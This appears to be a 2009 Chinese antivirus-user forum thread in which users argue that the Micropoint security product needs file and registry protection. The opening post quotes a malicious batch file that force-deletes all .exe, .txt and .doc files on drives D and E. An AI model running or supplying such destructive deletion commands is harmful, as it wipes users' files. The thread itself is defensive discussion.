Board logo

标题: 微点急需加强文件保护!!!! [打印本页]
作者: wsmurderer     时间: 2009-2-26 01:22    标题: 微点急需加强文件保护!!!!

在这个帖子我已经提到了大量文件被删微点没有任何反应http://bbs.micropoint.com.cn/sho ... ;page=2&fpage=1
今天晚上到卡饭上闲逛又发现了一个删除文件的病毒
http://bbs.kafan.cn/thread-431217-1-1.html
在后面有人分析了这个程序
client通过cmd.exe运行temp目录下随机数字名.bat。删除D、E盘根目录下的.exe、.txt、.doc文件。
.bat文件的内容:
@shift
del /f /s /q d:\*.exe
del /f /s /q e:\*.exe
del /f /s /q d:\*.txt
del /f /s /q e:\*.txt
del /f /s /q d:\*.doc
del /f /s /q e:\*.doc
这样的程序并不是一般的木马,而是纯粹的搞破坏。如果真的被这样的程序得逞可能会比一般的破坏系统的病毒后果更严重了,特别是对于机子上有特别重要文件的用户来说,到时候重要文件被删除只能是欲哭无泪了!但往往这种情况有不足以判断为木马病毒。鉴于此种情况建议微点加入一个文件保护的功能,可以自定义需要保护的文件。顺便提一下注册表保护的功能,微点的注册表保护也是很不完善的,当然这是在易用性和安全性之间做的一种妥协。因此也希望微点也能在不影响微点行为判断的基础上加入自定义注册表保护的功能!希望微点仔细认真考虑,拜托,拜托!
当初用微点也是看到了其易用性,但这个易用性却是隐藏了不少的问题
希望不要让我放弃微点而重回复杂难用hips!!!阿门!:cool:
作者: keyoushi     时间: 2009-2-26 03:13
SO,基于微点的工作原理,加一个不用inline hook技术的安全软件相对更好一些......微点对.bat不是很敏感,但是这样的文件也不能说是病毒,哪怕它执行格式化硬盘。
那个帖子我事先是做了些防备的。你说的这个先去看看先~
作者: keyoushi     时间: 2009-2-26 03:30
这个.......汗,卡巴红伞全过.......
值得注意的是这一句:TLS hooks: YES
恶搞,很恶搞........如果调用cmd.exe删除微点文件先.......

[ Last edited by keyoushi on 2009-2-26 at 03:42 ]
附件 1: 1.jpg (2009-2-26 03:37, 26.08 K,下载次数: 51)


附件 2: 2.jpg (2009-2-26 03:37, 122.04 K,下载次数: 55)


附件 3: 3.jpg (2009-2-26 03:37, 109.27 K,下载次数: 48)


作者: snhao     时间: 2009-2-26 09:44
这个与用户手动删除文件也没啥区别嘛,难道把用户的行为也判定为病毒行为么?
作者: Beloved     时间: 2009-2-26 10:26
除了文件保护还有注册表保护

现有的,虽然病毒运行可以阻止,但是可能已感染文件,修改注册表过了

而这些已造成的损坏,微点是无法提供保护的

微点现在只是阻止病毒的运行,没RD,FD

现有的,还缺乏灵活性
作者: 御剑临风     时间: 2009-2-26 10:49
这和用户自己删除没什么区别。就是一个批处理文件。

你重装系统!微点还要拦截?你还可以卸载微点!你能说微点保护不好?
作者: wsmurderer     时间: 2009-2-26 11:41


  Quote:
Originally posted by snhao at 2009-2-26 09:44:
这个与用户手动删除文件也没啥区别嘛,难道把用户的行为也判定为病毒行为么?

http://bbs.micropoint.com.cn/sho ... ;page=2&fpage=1
难道这个病毒的行为你也能说是手动删除文件?那我就不明白了,应该是微点根本没在这方面做防护,也就是所说的没有FD,也就是说不管是怎样删除文件微点都不会管,根本不管手动不手动的事!!!
作者: 凡间幽灵     时间: 2009-2-26 11:45
没看太明白,不过即使没有文件保护,我觉得微点也没那么弱,不然早给删掉多少次了。。。。
FD,可有可无吧,用着没啥子感觉。。。
作者: Beloved     时间: 2009-2-26 12:03


  Quote:
Originally posted by 凡间幽灵 at 2009-2-26 11:45:
没看太明白,不过即使没有文件保护,我觉得微点也没那么弱,不然早给删掉多少次了。。。。
FD,可有可无吧,用着没啥子感觉。。。

如果一个感染性的病毒,运行的时候,虽然被微点拦截住了,还是感染了一些文件,已经造成危害了。拦截只是防止进一步的造成危害而已。此时,文件保护就很必要了,特别是一些重要文件
作者: wsmurderer     时间: 2009-2-26 12:14


  Quote:
Originally posted by Beloved at 2009-2-26 12:03:

如果一个感染性的病毒,运行的时候,虽然被微点拦截住了,还是感染了一些文件,已经造成危害了。拦截只是防止进一步的造成危害而已。此时,文件保护就很必要了,特别是一些重要文件

我也是这个观点,感染文件和删除文件的目的都差不多,虽然理论上说被删除还能恢复,但实际操作起来还是有困难的。既然微点能阻止感染文件,为什么就不能阻止删除文件的行为呢?
作者: 凡间幽灵     时间: 2009-2-26 12:15
先装微点的话能拦掉的,一般就感染不了文件
如果是先中的招,那就麻烦了,最好用专杀修复,或者直接干掉算了
不过貌似最近木马盛行,感染性的病毒没啥新技术出现了。。。。。。。。
作者: keyoushi     时间: 2009-2-26 13:19
插科打诨的人就不要爱理他,我觉得光是TLS HOOKS这个就足以确认为后门了......
这个东西严格来讲的确不能算作病毒,但确实是完完全全的恶意程序。觉得微点还是应该在使用上给用户一些灵活设置的权利,比如卡巴,红伞,小A都有的禁止自动执行脚本文件,禁止自动执行批处理等。
作者: keyoushi     时间: 2009-2-26 13:20
不知道晓月的那个瞬杀微点的样本是否也是用QSF编辑的批处理,谁能找来研究下......
作者: wsmurderer     时间: 2009-2-26 15:39
无奈的是。。。微点今天还是报了

作者: mamsds     时间: 2009-2-26 17:21
我相信没有杀毒软件可以防御这种“病毒‘............
作者: keke0905     时间: 2009-2-26 19:52


  Quote:
Originally posted by wsmurderer at 2009-2-26 15:39:
无奈的是。。。微点今天还是报了


报就对了,说明微点的技术人员反映还是很快的。
作者: dvbphoenix     时间: 2009-2-27 09:50
用这种程度的东西想要删除微点的文件简直是不可能...

现在的一般杀软是不会拦截命令行文件的...不过只要微点加入拦截命令行的规则就好了...这方面完全没有问题...每一次当有命令行运行的时候微点都问问是否放行...这样就大致上没啥大问题了...
作者: snhao     时间: 2009-2-28 09:49
那还叫主动防御么?这问下那问下。
作者: notblack     时间: 2009-2-28 10:57
我装了微点,自己用命令行还删不掉呢!
作者: wsmurderer     时间: 2009-2-28 11:21
我的意思是微点单独加一个文件保护模块,而且不会影响到其主防的判断,也就是这个模块跟主防无关,专门用来保护文件用的
作者: zczc333     时间: 2009-2-28 13:32
微点是高级主动防御,如果用上保护文件机制,那不是和那些死的靠手动规则的HIPS一样了吗 你要保护自定义文件可以用普通HIPS嘛
作者: lonber     时间: 2009-2-28 17:58
楼主的意思是不是想让微点改进修复的功能??



欢迎光临 微点交流论坛 (http://bbs.micropoint.com.cn/) bbs.micropoint.com.cn